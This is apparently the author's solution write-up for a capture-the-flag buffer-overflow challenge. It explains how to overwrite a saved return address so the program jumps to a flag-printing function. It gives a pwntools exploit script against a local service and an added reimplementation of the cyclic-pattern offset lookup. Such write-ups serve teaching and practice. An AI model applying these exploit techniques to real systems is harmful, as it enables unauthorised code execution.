Přezdívkovač - Author's Solution of the Challenge
Solution
You need to use a buffer overflow to overwrite the saved return address with the address
of the function sladke_vitezstvi, which prints the flag.
Exploit script
An example exploit is provided. By default it targets localhost on port 9999;
this can easily be changed in the remote('localhost', 9999) call inside the exploit (line 21).
NOTE: The exploit requires the pwntools library.
```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./chall
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF(args.EXE or './chall')

# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:
        # Change host and port here to point the exploit at another target
        return remote('localhost', 9999)
    else:
        return process([exe.path] + argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     amd64-64-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX enabled
# PIE:      No PIE (0x400000)

io = start()

# The offset of the saved return address was found with a cyclic pattern:
# cyclic_find() turns the value that landed in the return address into the
# offset, and fit() pads the payload up to that offset and places the address
# of sladke_vitezstvi there (no PIE, so the symbol address is fixed).
payload = fit({
    cyclic_find(0x6261616362616162): exe.sym['sladke_vitezstvi'],
})

io.sendlineafter(b"no: ", payload)
flag = io.recvall()
log.success(flag)
```
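To show where the argument of cyclic_find in the script comes from, here is an added example (not part of the author's solution) that reimplements, without pwntools, the de Bruijn pattern pwntools' cyclic() generates, the lookup cyclic_find() performs on the value left in the return address, and the padding-then-address layout fit() builds; the a-z alphabet and 4-byte window are assumed to be pwntools' defaults.

```python
import string
import struct

ALPHABET = string.ascii_lowercase   # pwntools' default alphabet
N = 4                               # pwntools' default cyclic_size

def de_bruijn(alphabet=ALPHABET, n=N):
    """Lexicographically smallest de Bruijn sequence B(k, n), built with the
    FKM construction in the same order pwntools' cyclic() emits it: every
    n-char window occurs once, so a crash value maps to exactly one offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

def cyclic(length):
    """First `length` bytes of the pattern (the input that caused the crash)."""
    gen = de_bruijn()
    return "".join(next(gen) for _ in range(length)).encode()

def cyclic_find(value, n=N):
    """Offset of `value` (bytes, or a little-endian int) in the pattern.
    As in pwntools only the first n bytes count: 0x6261616362616162 is
    b'baabcaab' little-endian, so the lookup key is b'baab'."""
    if isinstance(value, int):
        value = value.to_bytes(8, "little")
    needle, window = value[:n], b""
    for i, ch in enumerate(de_bruijn()):
        window = (window + ch.encode())[-n:]
        if window == needle:
            return i - n + 1       # index where the window starts
    return -1

def build_payload(offset, target_addr):
    """What fit({offset: addr}) produces: padding, then the 64-bit target."""
    return b"A" * offset + struct.pack("<Q", target_addr)
```

With these defaults cyclic_find(0x6261616362616162) returns 104, i.e. the saved return address begins 104 bytes into the input the program reads.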